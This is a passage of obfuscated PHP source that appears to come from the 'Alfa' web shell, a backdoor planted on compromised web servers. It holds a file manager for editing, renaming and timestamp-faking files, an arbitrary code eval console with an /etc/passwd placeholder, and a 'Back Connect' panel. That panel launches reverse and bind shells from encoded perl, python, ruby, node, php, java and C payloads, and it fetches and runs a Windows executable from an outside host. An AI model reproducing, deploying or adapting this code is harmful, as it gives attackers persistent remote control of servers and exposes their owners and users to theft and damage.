@touch($_POST["alfa1"], $time, $time); } goto uu10Z; URz9V: $time = @filemtime($_POST["alfa1"]); goto dsfcG; uu10Z: } goto XXUiY; JUoPf: echo "</textarea><p><input type="submit" value=" "></p></form>"; goto H9KJ1; p_c_E: if (!@is_writable($_POST["alfa1"]) && !_alfa_is_writable($_POST["alfa1"])) { echo "File isn't writeable"; break; } goto RtRTI; H9KJ1: break; goto g8wH1; g8wH1: case "hexdump": goto J0pFd; uP7ws: $c = __read_file($_POST["alfa1"]); goto hIcq9; uZkaR: break; goto LKaTC; hIcq9: $n = 0; goto BDrZ3; J0pFd: @chdir($_POST["c"]); goto uP7ws; ybzJE: $len = strlen($c); goto HL3ZU; qOLJP: echo "<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table></div></div>"; goto uZkaR; HL3ZU: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto fFprH; LxEAs: $h[1] .= "<br>"; goto eTt4E; R3Kdd: if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } goto LxEAs; eTt4E: $h[2] .= "\xa"; goto WZjLy; fFprH: $n = 0; goto R3Kdd; WZjLy: } } goto qOLJP; BDrZ3: $h = array("00000000<br>", '', ''); goto ybzJE; LKaTC: case "rename": goto WZdAq; Cy2q1: echo "<form onsubmit="editor('" . $alfa1_escape . "','" . $_POST["alfa2"] . "',this.name.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><input type="text" name="name" value="" . addslashes(htmlspecialchars(isset($_POST["alfa3"]) && $_POST["alfa3"] != '' ? $_POST["alfa3"] : $alfa1_decoded)) . ""><input type=submit value=" "></form>"; goto MGPTC; MGPTC: break; goto zqrrX; UODsG: if (!empty($_POST["alfa3"])) { goto pIXzp; pIXzp: $cmd_rename = false; goto vM_Im; BjMTS: if (!@rename($_POST["alfa1"], $_POST["alfa3"]) && $cmd_rename) { echo "Can't rename!<br>"; } else { echo "Renamed!<script>try{$("" . $_POST["alfa4"] . "").innerHTML = "<div class='editor-icon'>"+loadType('" . $alfa3_escape . "','" . $ftype . "','" . $_POST["alfa4"] . "')+"</div><div class='editor-file-name'>" . $alfa3_escape . "</div>";editor_files["" . $_POST["alfa4"] . ""].file = "" . $alfa3_escape . "";d.files.innerHTML = d.files.innerHTML.replace(/\'" . $alfa1_escape . "\'/g, "'" . $alfa3_escape . "'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"" . $alfa1_escape . "\"/, 'value\=\"" . $alfa3_escape . "\"');d.files.innerHTML = d.files.innerHTML.replace(/" . $alfa1_escape . "\<\/a\>/g, "" . $alfa3_escape . "</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # " . $alfa1_escape . " # \?/, "Are You Sure For Delete # " . $alfa3_escape . " # ?");" . ($ftype == "dir" ? "updateDirsEditor('" . $_POST["alfa4"] . "','" . $alfa1_escape . "');" : '') . "}catch(e){console.log(e)}</script>"; $alfa1_escape = $alfa3_escape; } goto QyRsG; vM_Im: if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["alfa1"])) { $alfa1_escape = addslashes($alfa1_decoded); alfaEx("cd '" . addslashes($_POST["c"]) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST["alfa3"]) . "'"); } else { $cmd_rename = true; } } else { $alfa1_escape = addslashes($_POST["alfa1"]); } goto BjMTS; QyRsG: } goto Cy2q1; WZdAq: @chdir($_POST["c"]); goto I2_4o; I2_4o: $alfa1_escape = addslashes($_POST["alfa1"]); goto mRHIJ; mRHIJ: $alfa3_escape = addslashes($_POST["alfa3"]); goto UODsG; zqrrX: case "touch": goto i3376; AJQA6: if (!empty($_POST["alfa3"])) { $time = strtotime($_POST["alfa3"]); if ($time) { goto yyp8d; u9wgU: if ($chdir_fals && $alfa_canruncmd) { alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST["alfa3"])) . "' '" . addslashes($alfa1_decoded) . "'"); $touched = true; } goto wfLmj; yyp8d: $touched = false; goto u9wgU; wfLmj: if (!@touch($_POST["alfa1"], $time, $time) && !$touched) { echo "Fail!"; } else { echo "Touched!"; } goto tg5Gz; tg5Gz: } else { echo "Bad time format!"; } } goto zrzHs; L1ZOB: echo "<script>alfa3_="";</script><form onsubmit="editor('" . addslashes($_POST["alfa1"]) . "','" . $_POST["alfa2"] . "',this.touch.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", $chdir_fals ? $file_info[4] : @filemtime($_POST["alfa1"])) . ""><input type=submit value=" "></form>"; goto jG25O; zrzHs: clearstatcache(); goto L1ZOB; i3376: @chdir($_POST["c"]); goto AJQA6; jG25O: break; goto HjSCn; HjSCn: case "image": goto AMZsT; R4a0C: $file = $_POST["alfa1"]; goto QsQIU; zfW0M: break; goto wb0_o; QsQIU: $image_info = @getimagesize($file); goto etpzu; AMZsT: @chdir($_POST["c"]); goto kZrSf; etpzu: if (is_array($image_info) || $chdir_fals) { goto jQDIO; ISOFZ: if ($width > 800) { $width = 800; } goto gO7By; gO7By: echo $content = "<div class='editor-view'><div class='view-content'><center>" . $image_info_h . "<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:" . $image_info["mime"] . ";base64," . $source . "' alt='" . $file . "'></center></div></div><br>"; goto Q6ktJ; OvwZb: $height = (int) $image_info[1]; goto ie_49; jQDIO: $width = (int) $image_info[0]; goto OvwZb; x4xLL: $image_info_h = "Image type = <span>[</span> " . $image_info["mime"] . " <span>]</span><br>Image Size = <span>[ </span>" . $width . " x " . $height . "<span> ]</span><br>"; goto ISOFZ; ie_49: if ($chdir_fals && $alfa_canruncmd) { goto mxUHn; auf58: $image_info["mime"] = $mime[1]; goto sV26q; FM0kP: list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '" . addslashes($file) . "'")); goto yx2XD; yx2XD: $mime = explode(":", alfaEx("file --mime-type '" . addslashes($file) . "'")); goto auf58; mxUHn: $source = alfaEx("cat '" . addslashes($file) . "' | base64"); goto FM0kP; sV26q: } else { $source = __ZW5jb2Rlcg(__read_file($file, false)); } goto x4xLL; Q6ktJ: } goto zfW0M; kZrSf: echo "<hr>"; goto R4a0C; wb0_o: } goto aHr2T; DwHFu: if (isset($_POST["alfa1"])) { $_POST["alfa1"] = rawurldecode($_POST["alfa1"]); } goto IdPQl; CHzsD: if (!_alfa_file_exists(@$_POST["alfa1"])) { goto IS9uI; Pn8L7: alfaFooter(); goto clxaD; clxaD: return; goto FtExd; IS9uI: echo __pre() . "<center><p><div class="txtfont"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST["alfa4"] . "');</script>"; goto Pn8L7; FtExd: } goto SiQmD; CfItJ: $chdir_fals = false; goto xJwV2; UCqV4: if (empty($_POST["alfa2"])) { $_POST["alfa2"] = "view"; } goto C92O3; seBk0: echo "<span class="editor_file_info_vars">Name:</span> " . htmlspecialchars($alfa1_decoded) . " <span class="editor_file_info_vars">Size:</span> " . alfaSize($filesize) . " <span class="editor_file_info_vars">Permission:</span> " . $permcolor . " <span class="editor_file_info_vars">Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . " <span class="editor_file_info_vars">Directory:</span> " . str_replace("//", "/", ($chdir_fals ? '' : $_POST["c"] . "/") . $_POST["alfa1"]) . "<br><br>"; goto UCqV4; C92O3: if (!_alfa_is_dir($_POST["alfa1"])) { $m = array("View", "Edit", "Download", "Highlight", "Chmod", "Rename", "Touch", "Delete", "Image", "Hexdump"); $ftype = "file"; } else { $m = array("Chmod", "Rename", "Touch"); $ftype = "dir"; } goto s9C_D; QwnXn: if ($_POST["alfa2"] == "rename" && !empty($_POST["alfa3"]) && @is_writable($_POST["alfa1"])) { $rename_cache = $_POST["alfa3"]; } goto aSU3s; aSU3s: if (@$_POST["alfa2"] == "mkfile") { goto Swazw; aB9hL: if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["c"])) { alfaEx("cd '" . addslashes($_POST["c"]) . "';touch '" . addslashes($alfa1_decoded) . "'"); $_POST["alfa2"] = "edit"; } } goto jt7Z4; jt7Z4: if (!@file_exists($_POST["alfa1"])) { $fp = @fopen($_POST["alfa1"], "w"); if ($fp) { $_POST["alfa2"] = "edit"; fclose($fp); } } else { $_POST["alfa2"] = "edit"; } goto g6hNt; Swazw: $_POST["alfa1"] = trim($_POST["alfa1"]); goto aB9hL; g6hNt: } goto CHzsD; ClaEI: alfahead(); goto SA7WK; Yh3Ne: if ($_POST["alfa2"] == "auto") { if (is_array(@getimagesize($_POST["alfa1"]))) { $_POST["alfa2"] = "image"; } else { $_POST["alfa2"] = "view"; if ($chdir_fals) { if ($alfa_canruncmd) { goto G2oIu; GykT4: $mimetype = $mime[1]; goto k0Dgs; k0Dgs: if (!empty($mimetype)) { if (strstr($mimetype, "image")) { $_POST["alfa2"] = "image"; } } goto kTC1t; G2oIu: $mime = explode(":", alfaEx("file --mime-type '" . addslashes($_POST["alfa1"]) . "'")); goto GykT4; kTC1t: } } } } goto QwnXn; IdPQl: $alfa1_decoded = $_POST["alfa1"]; goto CfItJ; SA7WK: echo "<div class="filestools">"; goto DwHFu; H9fAs: alfaFooter(); goto x_0cA; s9C_D: foreach ($m as $v) { echo $v == "Delete" ? "<a href="javascript:void(0);" onclick="var chk=confirm('Are You Sure For Delete This File ?');chk?editor('" . addslashes(!isset($rename_cache) ? $_POST["alfa1"] : $rename_cache) . "','" . strtolower($v) . "','','" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "'):'';"><span class="editor_actions">" . (strtolower($v) == @$_POST["alfa2"] ? "<b><span class="editor_actions"> " . $v . " </span> </b>" : $v) . " | </span></a> " : "<a href="javascript:void(0);" onclick="editor('" . addslashes(!isset($rename_cache) ? $_POST["alfa1"] : $rename_cache) . "','" . strtolower($v) . "','','" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "')"><span class="editor_actions">" . (strtolower($v) == @$_POST["alfa2"] ? "<b><span class="editor_actions"> " . $v . " </span> </b>" : $v) . " | </span></a>"; } goto klAM2; klAM2: echo "<br><br>"; goto z81PZ; xJwV2: if (!@chdir($_POST["c"])) { goto wHisA; ScvlW: $alfa_canruncmd = _alfa_can_runCommand(true, true); goto gNUcp; gNUcp: if ($alfa_canruncmd) { goto XOVtM; ekO59: $file_info = explode(":", alfaEx("stat -c "%F:%U:%G:%s:%Y:0%a:%A" "" . $slashed_alfa1 . """)); goto gyGb7; XOVtM: $slashed_alfa1 = addslashes($_POST["alfa1"]); goto ekO59; gyGb7: $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi"); goto Cy4tj; Cy4tj: } goto lnXcZ; wHisA: $chdir_fals = true; goto ekaWN; ekaWN: $_POST["alfa1"] = $_POST["c"] . "/" . $_POST["alfa1"]; goto ScvlW; lnXcZ: } goto Yh3Ne; aHr2T: echo "</div>"; goto H9fAs; SiQmD: if ($chdir_fals) { goto ezLQ_; FYZk8: $gid["name"] = $file_info[2]; goto k9W4C; ezLQ_: $filesize = $file_info[3]; goto o3vBM; k9W4C: $permcolor = alfaPermsColor(array("class" => $perm_color_class, "num" => $file_info[5], "human" => $file_info[6]), true); goto RnoWj; o3vBM: $uid["name"] = $file_info[1]; goto FYZk8; RnoWj: } else { goto gYQ46; zLcat: $filesize = @filesize($_POST["alfa1"]); goto XhEnB; OCeev: $permcolor = alfaPermsColor($_POST["alfa1"]); goto zLcat; yP_bS: $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST["alfa1"])) : ''; goto pC4df; pC4df: if (!$uid && !$gid) { $uid["name"] = function_exists("fileowner") ? @fileowner($_POST["alfa1"]) : ''; $gid["name"] = function_exists("filegroup") ? @filegroup($_POST["alfa1"]) : ''; } goto OCeev; gYQ46: $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST["alfa1"])) : ''; goto yP_bS; XhEnB: if (!isset($uid["name"], $gid["name"]) || empty($uid["name"]) || empty($gid["name"])) { if (_alfa_can_runCommand()) { list($uid["name"], $gid["name"]) = explode(":", alfaEx("stat -c "%U:%G" "" . addslashes($_POST["c"] . "/" . $_POST["alfa1"]) . """)); } } goto C25Ot; C25Ot: } goto seBk0; x_0cA: } goto SIiKg; iXJiQ: @session_start(); goto mMKnX; UqiuZ: function alfaconnect() { goto Kax0T; fPWIo: $python = "pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw=="; goto YVM_9; WbLvW: if (isset($_POST["alfa1"]) && !empty($_POST["alfa1"])) { goto g4_8a; HQtUI: $allow = array("perl", "ruby", "python", "node"); goto pOMAu; pOMAu: eval("$lan=$" . $lang . ";"); goto p1Rwf; smqQN: $tmpdir = ALFA_TEMPDIR; goto CKmAt; RpQG2: $ip = $_POST["alfa2"]; goto vVexs; p1Rwf: if (in_array($lang, $allow)) { if (__write_file($name, __get_resource($lan))) { if (_alfa_can_runCommand(true, true)) { goto uM2u5; ee0eA: if ($out == '') { $out = "<font color='green'><center>[ Finished...! ]</center></font>"; } goto x9mOK; uM2u5: $os = $GLOBALS["sys"] != "win" ? "1>/dev/null 2>&1 &" : ''; goto BAM19; x9mOK: echo "<pre class='ml1' style='margin-top:5px'>{$out}</pre>"; goto KwF_d; BAM19: $out = alfaEx("{$lang} {$name} {$arg} {$os}"); goto ee0eA; KwF_d: } } else { echo "<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>"; } } goto FGZwp; TQb7I: $arg = $_POST["alfa4"] == "bind" ? $port : $port . " " . $ip; goto smqQN; CKmAt: $name = $tmpdir . "/" . $lang . uniqid() . rand(1, 99999); goto HQtUI; yMLw5: if ($lang == "php") { goto TjHWA; TjHWA: echo "<pre class=ml1 style='margin-top:5px'>"; goto qg23s; mBoXX: echo "</pre>"; goto Q15jf; lo1mh: if ($code !== false) { goto mGdQV; BgBoe: eval($code); goto NDrPU; NDrPU: echo "<center><font color='green'>[ Finished...! ]</font></center>"; goto MArr9; mGdQV: $code = "$target = "" . $arg . "";\xa" . $code; goto BgBoe; MArr9: } goto mBoXX; qg23s: $code = __get_resource($lan); goto lo1mh; Q15jf: } goto CTFmu; jGH92: if ($lang == "bcwin") { goto O0xRM; L0djk: @fclose($f); goto Kf2os; O0xRM: $alfa = new AlfaCURL(); goto jQ1s6; wX9Iy: @fwrite($f, $s); goto L0djk; Kf2os: $out = alfaEx($tmpdir . "/bcwin.exe " . $_POST["alfa2"] . " " . $_POST["alfa3"]); goto uMdgN; cjH6w: $f = @fopen($tmpdir . "/bcwin.exe", "w+"); goto wX9Iy; jQ1s6: $s = $alfa->Send("http://solevisible.com/bc/windows.exe"); goto AuVLE; AuVLE: $tmpdir = ALFA_TEMPDIR; goto cjH6w; uMdgN: } goto yMLw5; vVexs: $port = $_POST["alfa3"]; goto TQb7I; FGZwp: if ($lang == "java" || $lang == "c") { goto PwwmC; fn1xg: echo "<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>"; goto WNTOW; HqaeE: $out = nl2br(bcinit($lang, $code, '', '')); goto fn1xg; PwwmC: $code = __get_resource($lan); goto HqaeE; WNTOW: } goto jGH92; g4_8a: $lang = $_POST["alfa1"]; goto RpQG2; CTFmu: } goto PhdsI; SUVC7: $cbArr = array("php" => "Php", "perl" => "Perl", "python" => "Python", "ruby" => "Ruby", "c" => "C", "java" => "Java", "node" => "NodeJs", "bcwin" => "Windows"); goto ZSPYk; Svnjx: $ruby = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs="; goto oIYte; Kax0T: alfahead(); goto r7DwB; ObzMC: echo "<form onSubmit="g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;">\xd
<div class="txtfont">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class="txtfont">Use:</div> <select name='selectCb'>"; goto SUVC7; YVM_9: $perl = "lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA=="; goto Svnjx; oIYte: $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw=="; goto n7bWx; PmlaC: alfafooter(); goto Zt7M9; A7nOA: $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D"; goto hfu2N; PhdsI: echo "</div>"; goto PmlaC; r7DwB: $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU="; goto fPWIo; hfu2N: echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>"; goto ObzMC; fb71r: echo "</select> <div id='bcipAction' style='display:inline-block;'><div class="txtfont">IP:</div> <input type='text' style='text-align:center;' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'></div> <div class="txtfont">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>"; goto WbLvW; n7bWx: $c = "tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw=="; goto A7nOA; ZSPYk: foreach ($cbArr as $key => $val) { echo "<option value='{$key}' " . ($GLOBALS["sys"] == "win" ? "selected" : '') . ">{$val}</option>"; } goto fb71r; Zt7M9: } goto B1TDg; YmHhB: function alfaphpeval() { goto DVuGb; VHE1U: echo "<div class=header><Center><a href=javascript:void(0) onclick="g('phpeval',null,'','ini')">| INI_INFO | </a><a href=javascript:void(0) onclick="g('phpeval',null,'','info')"> | phpinfo |</a><a href=javascript:void(0) onclick="g('phpeval',null,'','exten')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g('phpeval',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">" . $lang_html . "</select><br><br><textarea placeholder="file_get_contents('/etc/passwd');" name=code class=bigarea id=PhpCode>" . (!empty($_POST["alfa1"]) ? htmlspecialchars($_POST["alfa1"]) : '') . "</textarea><center><input type="submit" value="" style="margin-top:5px"></center>"; goto rWVQU; jbtJu: if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "ini") { goto NB92_; TG2Dr: $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); goto ued13; SfTfu: print "<table border=0><tr>" . "<td class="listing"><font class="highlight_txt">Param</td>" . "<td 